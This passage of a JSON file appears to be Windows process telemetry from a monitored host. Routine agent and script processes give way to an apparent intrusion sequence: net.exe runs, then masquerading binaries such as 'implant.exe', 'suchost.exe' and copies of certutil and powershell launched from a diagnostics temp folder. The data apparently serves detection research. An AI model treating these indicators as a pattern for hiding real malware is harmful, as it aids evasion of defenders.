",\"365/168/322\",\"365/168/323\",\"365/168/324\",\"365/168/325\",\"365/168/326\",\"365/168/327\",\"365/168/328\",\"365/168/329\",\"365/168/330\",\"365/168/331\",\"365/168/332\",\"365/168/333\",\"365/168/334\",\"365/168/335\",\"365/168/336\",\"365/21\",\"365/32\",\"365/337\",\"365/37\",\"365/75\",\"366\",\"366/180\",\"366/188\",\"366/236\",\"366/54\",\"367\",\"367/77\",\"367/77/78\",\"367/77/84\",\"367/77/84/85\",\"368\",\"368/176\",\"368/176/177\",\"368/176/179\"],\"proc_key\":[\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x888|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x364|2019-01-15 04:15:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1c4|2019-01-15 04:16:24.007000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x99c|2019-01-15 04:16:24.027000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x93c|2019-01-15 04:19:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xfbc|2019-01-15 04:50:26.010000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x244|2019-01-15 04:51:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1050|2019-01-15 04:52:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x690|2019-01-15 04:52:24.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1364|2019-01-15 04:52:26.013000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x8e4|2019-01-15 04:53:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x10fc|2019-01-15 04:54:24.003000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1298|2019-01-15 04:54:24.020000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x138c|2019-01-15 04:20:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1258|2019-01-15 04:20:24.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xf94|2019-01-15 04:54:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xddc|2019-01-15 04:55:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xbe8|2019-01-15 04:56:24.003000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x130c|2019-01-15 04:56:24.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1370|2019-01-15 04:56:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xc18|2019-01-15 04:57:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xa84|2019-01-15 04:58:24.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1348|2019-01-15 04:58:24.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x11b4|2019-01-15 04:58:26.010000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1148|2019-01-15 04:59:26.017000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x10e0|2019-01-15 05:00:24.003000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x12fc|2019-01-15 05:00:24.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x518|2019-01-15 05:00:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x13b4|2019-01-15 05:01:26.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xd64|2019-01-15 05:02:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xc18|2019-01-15 05:02:24.027000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x108c|2019-01-15 05:02:26.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x28c|2019-01-15 05:02:28.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x11b4|2019-01-15 05:02:28.270000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xf84|2019-01-15 05:03:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xd64|2019-01-15 05:04:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xc18|2019-01-15 05:04:24.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x123c|2019-01-15 04:20:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x10a4|2019-01-15 05:04:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1040|2019-01-15 05:05:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x690|2019-01-15 05:06:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x11ac|2019-01-15 05:06:24.043000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xc18|2019-01-15 05:06:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1284|2019-01-15 05:07:26.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xb10|2019-01-15 05:08:24.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x2a8|2019-01-15 05:08:24.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x544|2019-01-15 04:21:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x130c|2019-01-15 05:08:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xc84|2019-01-15 05:09:26.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x570|2019-01-15 05:10:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x28c|2019-01-15 05:10:24.047000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xd14|2019-01-15 05:10:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xbd8|2019-01-15 05:11:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x123c|2019-01-15 05:12:24.007000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xcd8|2019-01-15 05:12:24.023000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x894|2019-01-15 04:22:24.017000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xde8|2019-01-15 04:22:24.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1298|2019-01-15 05:12:26.003000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xc84|2019-01-15 05:13:26.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x690|2019-01-15 05:14:24.003000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x123c|2019-01-15 05:14:24.023000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xa10|2019-01-15 05:14:26.013000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2f8|2019-01-15 04:22:26.010000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x13a4|2019-01-15 04:23:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x11e8|2019-01-15 04:24:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x364|2019-01-15 04:24:24.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x338|2019-01-15 04:24:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xbdc|2019-01-15 04:25:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x57c|2019-01-15 04:26:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x10fc|2019-01-15 04:26:24.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1054|2019-01-15 04:26:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x638|2019-01-15 04:27:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x107c|2019-01-15 04:28:24.003000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1064|2019-01-15 04:28:24.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x16c4|2019-01-15 05:15:26.013000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x17fc|2019-01-15 05:16:24.003000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x17f0|2019-01-15 05:16:24.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1404|2019-01-15 05:16:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1594|2019-01-15 05:17:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1630|2019-01-15 05:18:24.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x16a0|2019-01-15 05:18:24.027000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1658|2019-01-15 05:18:26.010000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1740|2019-01-15 05:19:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1490|2019-01-15 05:20:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x148c|2019-01-15 05:20:24.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1530|2019-01-15 05:20:26.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x7b4|2019-01-15 05:21:26.003000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1550|2019-01-15 05:22:24.007000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x15d0|2019-01-15 05:22:24.023000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x16d0|2019-01-15 05:22:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x11a8|2019-01-15 05:23:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1610|2019-01-15 05:24:24.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1790|2019-01-15 05:24:24.023000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1258|2019-01-15 04:28:26.013000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x28c|2019-01-15 05:24:26.010000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xac4|2019-01-15 04:29:26.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x364|2019-01-15 04:30:24.007000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1128|2019-01-15 04:30:24.023000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x13e0|2019-01-15 04:16:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x12e8|2019-01-15 04:30:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x11e4|2019-01-15 04:31:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xa08|2019-01-15 04:32:24.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x125c|2019-01-15 04:32:24.027000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1020|2019-01-15 04:32:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1380|2019-01-15 04:33:26.003000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1254|2019-01-15 04:17:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x13e4|2019-01-15 04:34:24.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x10e4|2019-01-15 04:34:24.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xfbc|2019-01-15 04:34:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xa4|2019-01-15 04:35:26.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x11cc|2019-01-15 04:36:24.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x99c|2019-01-15 04:36:24.027000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x11b0|2019-01-15 04:18:24.003000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1d0|2019-01-15 04:18:24.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xd14|2019-01-15 04:36:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1128|2019-01-15 04:37:26.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x13fc|2019-01-15 04:38:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x123c|2019-01-15 04:38:24.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x6bc|2019-01-15 04:38:26.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1388|2019-01-15 04:39:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xc08|2019-01-15 04:40:24.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x364|2019-01-15 04:40:24.027000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x12fc|2019-01-15 04:40:26.000000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x12dc|2019-01-15 04:41:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xb8|2019-01-15 04:42:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x11b4|2019-01-15 04:42:24.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xbdc|2019-01-15 04:42:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x54c|2019-01-15 04:43:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xfbc|2019-01-15 04:44:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x640|2019-01-15 04:44:24.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x13b0|2019-01-15 04:44:26.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\222\\\\pmfexe.exe|0x13b4|2019-01-15 04:45:24.523000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1148|2019-01-15 04:45:26.007000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0xc08|2019-01-15 04:46:24.017000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1338|2019-01-15 04:46:24.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x6ec|2019-01-15 04:18:26.010000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x6d4|2019-01-15 04:46:26.007000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xd14|2019-01-15 04:47:26.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x1094|2019-01-15 04:48:24.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1270|2019-01-15 04:48:24.030000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x6ec|2019-01-15 04:48:26.017000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xaa8|2019-01-15 04:49:26.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ct_602681692\\\\nativedsc\\\\desiredstateconfiguration\\\\asmhost.exe|0x138c|2019-01-15 04:50:24.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xa60|2019-01-15 04:50:24.017000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x280|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xab8|2019-01-15 04:50:25.693000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xb8|2019-01-15 04:52:25.613000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x7f8|2019-01-15 04:54:25.557000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1040|2019-01-15 04:56:25.490000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xe34|2019-01-15 04:58:25.427000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x5cc|2019-01-15 05:00:25.363000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xe3c|2019-01-15 05:01:52.640000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xf94|2019-01-15 04:20:25.423000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x10e0|2019-01-15 05:02:25.293000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xb50|2019-01-15 05:04:25.837000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xd04|2019-01-15 05:06:25.770000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x90c|2019-01-15 05:08:25.717000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xb8|2019-01-15 05:10:25.653000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xa10|2019-01-15 05:12:25.590000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x244|2019-01-15 05:14:25.517000\",\"c:\\\\windows\\\\system32\\\\dllhost.exe|0xc54|2019-01-15 05:15:03.017000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x778|2019-01-15 04:22:25.360000\",\"c:\\\\windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\tiworker.exe|0xe68|2019-01-15 05:15:05.193000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xc08|2019-01-15 04:24:25.307000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xd78|2019-01-15 04:26:25.833000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x10c8|2019-01-15 04:16:25.550000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1434|2019-01-15 05:16:25.453000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1694|2019-01-15 05:18:25.407000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1220|2019-01-15 04:28:25.770000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1414|2019-01-15 05:20:25.337000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x13b4|2019-01-15 05:22:25.863000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xcd8|2019-01-15 05:24:25.807000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xc54|2019-01-15 04:30:25.710000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x10f4|2019-01-15 04:32:25.650000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x5cc|2019-01-15 04:33:32.463000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x90c|2019-01-15 04:34:25.583000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x13a8|2019-01-15 04:35:16.060000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x11c4|2019-01-15 04:36:25.517000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x13e8|2019-01-15 04:38:25.453000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1338|2019-01-15 04:40:25.393000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1020|2019-01-15 04:42:25.387000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1070|2019-01-15 04:18:25.490000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0x1320|2019-01-15 04:44:25.867000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0xde8|2019-01-15 04:45:28.157000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xb8|2019-01-15 04:46:25.800000\",\"c:\\\\windows\\\\syswow64\\\\wbem\\\\wmiprvse.exe|0xc10|2019-01-15 04:48:25.743000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x440|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\musnotification.exe|0xd14|2019-01-15 05:12:25.403000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc8|2019-01-15 05:15:03.047000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x10cc|2019-01-15 05:15:03.057000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1288|2019-01-15 05:15:03.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x3dc|2019-01-15 05:15:03.257000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x2a8|2019-01-15 05:15:03.390000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0xa5c|2019-01-15 05:15:03.410000\",\"c:\\\\windows\\\\system32\\\\net.exe|0xfc0|2019-01-15 05:15:03.503000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x10b8|2019-01-15 05:15:03.517000\",\"c:\\\\windows\\\\system32\\\\net.exe|0xcd8|2019-01-15 05:15:03.830000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x12fc|2019-01-15 05:15:08.723000\",\"c:\\\\windows\\\\system32\\\\net.exe|0xc18|2019-01-15 05:15:10.667000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0xbb4|2019-01-15 05:15:10.683000\",\"c:\\\\windows\\\\system32\\\\net.exe|0x1274|2019-01-15 05:15:10.707000\",\"c:\\\\windows\\\\system32\\\\net1.exe|0x614|2019-01-15 05:15:10.730000\",\"c:\\\\diagnostics\\\\usertmp\\\\regsvr32.exe|0xd10|2019-01-15 05:15:10.753000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x135c|2019-01-15 05:15:11.190000\",\"c:\\\\diagnostics\\\\usertmp\\\\suchost.exe|0x103c|2019-01-15 05:15:11.260000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1014|2019-01-15 05:15:11.347000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0xbb4|2019-01-15 05:15:11.413000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x11cc|2019-01-15 05:15:11.493000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x123c|2019-01-15 05:15:11.537000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x132c|2019-01-15 05:15:11.617000\",\"c:\\\\diagnostics\\\\usertmp\\\\certutil.exe|0xa08|2019-01-15 05:15:11.767000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x4e8|2019-01-15 05:15:11.833000\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe|0x240|2019-01-15 05:15:11.947000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1450|2019-01-15 05:15:12.167000\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe|0x1250|2019-01-15 05:15:12.003000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1458|2019-01-15 05:15:12.167000\",\"c:\\\\diagnostics\\\\usertmp\\\\implant.exe|0x140c|2019-01-15 05:15:12.067000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1448|2019-01-15 05:15:12.160000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x142c|2019-01-15 05:15:12.123000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1498|2019-01-15 05:15:12.337000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x14ac|2019-01-15 05:15:12.393000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x14cc|2019-01-15 05:15:12.460000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x14e0|2019-01-15 05:15:12.513000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1500|2019-01-15 05:15:12.610000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x1514|2019-01-15 05:15:12.670000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1534|2019-01-15 05:15:12.740000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x154c|2019-01-15 05:15:12.847000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x156c|2019-01-15 05:15:12.930000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x1580|2019-01-15 05:15:12.977000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x15a0|2019-01-15 05:15:13.053000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x15b4|2019-01-15 05:15:13.100000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x15d4|2019-01-15 05:15:13.173000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x15e8|2019-01-15 05:15:13.220000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1608|2019-01-15 05:15:13.287000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x161c|2019-01-15 05:15:13.337000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x163c|2019-01-15 05:15:13.407000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x1650|2019-01-15 05:15:13.453000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x1670|2019-01-15 05:15:13.517000\",\"c:\\\\diagnostics\\\\usertmp\\\\powershell.exe|0x1684|2019-01-15 05:15:13.567000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x16a4|2019-01-15 05:15:13.633000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x16b8|2019-01-15 05:15:13.683000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x16d8|2019-01-15 05:15:13.747000\",\"c:\\\\diagnostics\\\\usertmp\\\\cmd.exe|0x16ec|2019-01-15 05:15:13.793000\",\"c:\\\\windows\\\\system32\\\\win32calc.exe|0x170c|2019-01-15 